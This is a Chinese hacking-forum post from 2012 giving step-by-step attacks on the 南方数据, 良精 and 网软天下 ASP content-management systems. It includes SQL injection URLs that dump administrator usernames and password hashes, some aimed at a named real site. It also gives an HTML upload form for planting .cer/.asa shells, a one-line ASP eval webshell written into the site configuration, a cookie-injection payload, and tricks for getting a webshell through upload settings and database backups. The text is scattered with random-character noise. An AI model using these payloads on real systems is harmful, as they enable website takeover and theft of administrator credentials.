找回密码
 立即注册
查看: 2806|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb* P$ i! j3 J1 b8 M! H' w' X
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7   O" w8 |+ p4 q8 k: q7 N
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
" |" b7 e8 `( @  f4 B) ?% P直接暴管理员帐号密码(md5)
. X+ i: ~2 q! m/ ]. Q2.登陆后台% A, c( u6 [  c' {- V& D3 j; V
3.利用编辑器上传:
1 v- C7 o+ Q0 e2 r访问admin/southidceditor/admin_style.asp
% y6 I2 p" s1 h7 y9 j$ @5 |修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.5 ^& h: Q, N$ z
" k- E. ], E3 C. v! Q
========================================4 d- {6 m) m& K0 i9 y

* ^, ~$ ?, G% K+ g参考资料整理:
- d+ L2 v' Y$ T1 `3 o南方数据、良精系统、网软天下漏洞利用
5 d# u( Y! U* q* A5 q
3 J& o- f7 l! X2 L. Q9 j1、通过upfile_other.asp漏洞文件直接取SHELL
, I3 @* w2 P6 f& _+ B直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
) @3 G4 W, t" j3 l3 l<HTML><HEAD>
' o2 n% d9 I: D( r/ i<META http-equiv=Content-Type content="text/html; charset=gb2312"> & `: b9 _- e4 W* g1 {' x
<STYLE type=text/css>BODY { + \+ y$ F$ n) v1 X
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
5 Z# d$ \4 ~8 ^9 T) ^, o$ T! O' u2 p} - D7 f! Q$ r9 c
.tx1 { % A  E5 T/ I% u- q& g( U7 e7 }
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px # I; V7 s5 J: ~
} ' Y- e1 z  j3 p7 |  K( v% X; Q
</STYLE>! [- R: O7 V) ?% W" M
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD> ' J. N; }( U' ^: i" f( x/ v) I$ z4 U
<BODY leftMargin=0 topMargin=0> 0 _+ S+ ~6 F6 F1 F) Q& W* p
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post
' \1 O5 z* ?4 I% y$ {4 eencType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
  D4 O( N* K1 N6 `9 N0 r<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>! y  g3 y9 W# }+ o# |
0 Y( q! C, k1 p" y
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。
4 W0 c/ ~, W' R) `注:此方法通杀南方数据、良精系统、网软天下等
2 O" |; t! |5 b9 _$ Z9 X! _
# J$ `# P7 W2 d# o  G" w4 N3 l2、通过注入秒杀管理员帐号密码,使用如下:
: b' X+ t$ S3 Shttp://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’+ k6 Q3 ^3 ^- j# ?' A
以上代码直接暴管理员帐号和密码,取SHELL方法如下:. u, A& G9 w% \8 V5 Z% h( C% ]
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’0 j0 E$ P/ g& h* Y- Z. G8 |3 `
成功把shell写入http://www.target.com/inc/config.asp+ Z7 [/ L% }+ J8 w4 t
这里一句话chr(32)密码是“#”1 R' h- F, D0 Z& v, d
3、cookie注入3 A  |4 Y# i* w
清空地址栏,利用union语句来注入,提交:
+ c! i* L- R9 Kjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
+ ^; V0 Y+ C4 ^, }$ ^9 E* v; \( I如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
; x; B$ a* g- R/ E* T注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。3 k- Z3 j# ^* D+ e1 W- P! v  B
(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
/ W; H+ K) f; M1 {2 a
2 s( l4 e  \9 m! i/ A% }三、后台取SHELL方法总结
3 s5 `/ X+ y+ @7 B, i6 B(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
% C& {7 z# p4 L5 U然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,; i3 D9 y* N9 M, c( h2 |
这时再打开一句话马的客户端,提交同样得到一个小马
6 G& R8 l+ a6 A- f  I, |(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)& o: x) Q4 }, I% ]& ~
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:
8 {# @. c  W' W8 J6 lif fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then1 o5 V  ]/ d6 r5 v# H1 |* z9 ]
EnableUpload=false8 _  H$ K" P/ a2 Z0 c6 I1 C2 w
) T5 B% w9 M2 e7 t
end if
- ^1 \4 I3 _0 B" ~( r  N6 Dif EnableUpload=false then
! n/ s$ N: u3 }' T% I2 u+ Emsg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
  `) ^; [: _- D( QFoundErr=true
; S4 q0 ]" [7 F9 l7 gend if
5 e% P6 n# o) }6 r' Z6 _6 s. @大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:
$ g# B. `* ]5 t# Y$ z* @提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)
& K/ z- R8 v8 T) ?' `(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的" P  j5 w  J! z2 ?6 E# I$ d
0 S) j6 }3 k# j) k. z( I
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
* v2 e/ [" {. [直接访问备份后的地址,就得到一个webshell" u8 l* k* L, G* ?! |& z
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表